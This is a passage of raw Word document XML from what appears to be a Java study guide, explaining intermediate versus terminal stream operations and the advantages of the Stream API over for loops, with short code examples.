        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38D5873E"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turn Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72B22EE9"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s another stream</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38BE953C"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s a result or produces side effects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="7DFC2FB2" w14:textId="77777777" w:rsidTr="00D844E8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A85EF34"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 Operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F36586A"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p(), filter(), distinct(), flatMap(), sorted()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02EA9FAC"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llect(), forEach(), reduce(), count(), min()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="4AC521A8" w14:textId="77777777" w:rsidTr="00D844E8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EBEB1EE"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an be chained?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04BCE862"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 multiple intermediate operations can be chained</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E2BA0D0"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terminal operations consume the stream and stop further operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="3A4A387D" w14:textId="77777777" w:rsidTr="00D844E8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07A8F88F"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ecution Trigger</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78544735"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oes not trigger the stream processing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="543CC479"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iggers the execution of the stream pipeline</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C65E7C7"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7C79AB5C" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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termediate Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: These operations modify the stream, and the results are not realized until a terminal operation is called.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AFE21B" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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erminal Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: These operations consume the stream and produce a final result or perform a side effect (like printing). Once a terminal operation is called, the stream is closed and cannot be used for further operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1081FF0D"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Intermediate operations help to transform and filter data, whereas terminal operations are used to obtain results or perform actions on the stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36928EBF" w14:textId="683F8EBC" w:rsidR="00DB4F13" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00DB4F1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F13DE2E">
          <v:rect id="_x0000_i1694" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6D37F0" w14:textId="77777777" w:rsidR="000620CC" w:rsidRPr="00CE4B95" w:rsidRDefault="000620CC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="227" w:name="_Toc196307707"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Advantages of Stream over for loop?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="227"/>
    </w:p>
    <w:p w14:paraId="1061DD63" w14:textId="28FE8F63" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">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Stream API</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> introduced in Java 8 offers several advantages over traditional </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>for loops</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Here are the key benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1576E134"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Concise and Readable Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAA5140" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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ream API allows writing functional-style code that is more </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>concise</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readable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> compared to for loops.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFBB10E" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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chaining</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of operations like filter(), map(), and collect() makes the code compact, reducing the need for verbose loops and conditionals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC457C0"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2D674FB8"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Using for loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6A200E"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Integer&gt; numbers = Arrays.asList(1, 2, 3, 4, 5);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555CAD99"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Integer&gt; result = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7CB1CE"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Integer number : numbers) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBE02E7"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number % 2 == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D82344F"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sult.add(number * 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571D6CC0"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EE1E87B"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BA06B48" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="344096A1"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Using Stream API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDF606D"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Integer&gt; result = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10830972"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lter(n -&gt; n % 2 == 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0E17B5"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n -&gt; n * 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB0448F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E42F890"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tream API code is more readable and declarative.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A46AB9D"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Improved Performance (Parallelism):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34329741" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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reams allow for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parallel processing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> out-of-the-box using the parallelStream() method. This enables </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multi-core processors</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to efficiently execute tasks in parallel without requiring complex thread management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E15DB3" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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parallel version of a stream divides the workload and processes parts of the collection simultaneously, potentially leading to significant performance improvements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D461A3"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39B27A3D"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Sequential Stream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F084FB4"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Integer&gt; result = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE66230"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n -&gt; n * 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D51B550"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A58ACB" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23CA4139"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Parallel Stream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2134F962"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Integer&gt; resultParallel = numbers.parallelStream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084FEEA2"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n -&gt; n * 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D828202"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C279AB"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ing </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parallel streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can greatly speed up processing when working with large collections, particularly if the operations inside the stream are computationally expensive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C2612C"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Functional Programming Style:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4116BCD6" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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reams allow for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> constructs like map(), filter(), reduce(), and flatMap() which can lead to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>less error-prone</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> code and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>higher-level abstractions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for common tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20572E24" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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can work with higher-order functions and lambda expressions for transforming data, making the code more </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>declarative</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and easier to reason about.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B91F118"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38DB13A4"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Traditional for loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478D3FF6"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String&gt; result = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DBA1DA"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String s : list) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DCE7BC"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s.startsWith("A")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B2F256"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sult.add(s);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21079B52"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BDE569B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAD4C87" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="225DB72E"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Using Streams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004914EA"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String&gt; result = list.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB40723"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lter(s -&gt; s.startsWith("A"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B82910D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B035E92"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functional approach with streams makes it clear what is happening (filtering strings that start with "A").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4FD197"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Avoiding Side Effects:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202883CB" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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reams help to minimize </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>side effects</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> since operations like map() and filter() are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pure functions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This is different from traditional loops, where modifying variables or other mutable states inside the loop can lead to unexpected behaviors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D54D8D7"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4B0F7EA1"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Side-effect prone in a for loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C79CE1E"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Integer&gt; result = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E51064"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Integer number : numbers) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B2AEB6"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sult.add(number * 2);  // Modifying external state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E5428D"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436EB2C" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09E8C98F"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No side effects in Stream API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42892CDE"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Integer&gt; result = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238B2A26"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n -&gt; n * 2)  // Pure function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDCC40E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5A152B"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ream operations are designed to be </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>side-effect free</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and don't mutate data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EAE26C"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Lazy Evaluation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFD0DDE" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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reams use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lazy evaluation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, meaning that operations like map(), filter(), etc., are not applied until a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>terminal operation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., collect(), forEach()) is invoked. This can lead to optimizations, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>short-circuiting</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the stream processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4609E62C"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 of Lazy Evaluation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D00EBD"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umbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD21997"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lter(n -&gt; n &gt; 5)        // This won't execute until terminal operation</w:t>
